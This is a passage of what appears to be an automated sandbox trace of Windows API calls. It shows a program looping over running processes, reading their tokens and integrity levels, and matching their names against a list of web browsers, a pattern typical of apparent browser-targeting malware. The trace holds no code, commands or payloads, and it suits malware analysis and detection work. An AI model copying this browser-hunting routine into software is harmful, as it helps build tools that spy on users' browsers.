(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0567.224] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0567.224] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0567.224] GetLastError () returned 0x7a [0567.224] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0567.224] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0567.224] CloseHandle (hObject=0x29c) returned 1 [0567.225] CloseHandle (hObject=0x298) returned 1 [0567.225] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0567.225] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0567.225] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0567.225] GetLastError () returned 0x7a [0567.225] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0567.225] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0567.225] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0567.225] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0567.225] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0567.225] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0567.225] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0567.225] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0567.225] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0567.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0567.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0567.225] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0567.225] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0567.225] GetLastError () returned 0x7a [0567.225] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0567.225] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0567.225] CloseHandle (hObject=0x29c) returned 1 [0567.225] CloseHandle (hObject=0x298) returned 1 [0567.225] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0567.225] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0567.225] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0567.225] GetLastError () returned 0x7a [0567.225] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0567.225] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0567.225] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0567.225] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0567.225] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0567.225] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0567.225] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0567.225] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0567.225] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0567.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0567.226] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0567.226] GetLastError () returned 0x7a [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0567.226] CloseHandle (hObject=0x29c) returned 1 [0567.226] CloseHandle (hObject=0x298) returned 1 [0567.226] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0567.226] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0567.226] GetLastError () returned 0x7a [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0567.226] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0567.226] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0567.226] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0567.226] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0567.226] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0567.226] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0567.226] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0567.226] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0567.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0567.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0567.226] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0567.226] GetLastError () returned 0x7a [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0567.226] CloseHandle (hObject=0x29c) returned 1 [0567.226] CloseHandle (hObject=0x298) returned 1 [0567.226] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0567.226] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0567.226] GetLastError () returned 0x7a [0567.226] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0567.226] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0567.226] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0567.227] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0567.227] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0567.227] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0567.227] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0567.227] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0567.227] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0567.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0567.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0567.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0567.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0567.227] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0567.227] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0567.227] GetLastError () returned 0x7a [0567.227] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0567.227] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0567.227] CloseHandle (hObject=0x29c) returned 1 [0567.227] CloseHandle (hObject=0x298) returned 1 [0567.227] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0567.227] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0567.227] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0567.227] GetLastError () returned 0x7a [0567.227] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0567.227] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0567.227] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0567.227] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0567.227] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0567.227] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0567.227] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0567.227] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0567.227] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0567.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0567.227] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0567.228] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0569.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9f28) returned 0xc0000004 [0569.244] VirtualAlloc (lpAddress=0x0, dwSize=0xaf28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0569.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaf28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0569.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0569.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0569.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0569.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0569.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0569.248] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0569.248] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0569.248] GetLastError () returned 0x7a [0569.248] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0569.248] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0569.249] CloseHandle (hObject=0x29c) returned 1 [0569.249] CloseHandle (hObject=0x298) returned 1 [0569.249] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0569.249] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0569.249] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0569.249] GetLastError () returned 0x7a [0569.249] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0569.249] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0569.249] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0569.250] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0569.250] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0569.250] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0569.250] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0569.250] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0569.250] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0569.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0569.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0569.250] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0569.250] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0569.251] GetLastError () returned 0x7a [0569.251] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0569.251] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0569.251] CloseHandle (hObject=0x29c) returned 1 [0569.251] CloseHandle (hObject=0x298) returned 1 [0569.251] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0569.251] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0569.251] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0569.252] GetLastError () returned 0x7a [0569.252] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0569.252] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0569.252] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0569.252] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0569.252] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0569.252] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0569.252] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0569.252] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0569.252] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0569.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0569.253] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0569.253] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0569.253] GetLastError () returned 0x7a [0569.253] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0569.253] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0569.253] CloseHandle (hObject=0x29c) returned 1 [0569.253] CloseHandle (hObject=0x298) returned 1 [0569.253] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0569.254] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0569.254] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, 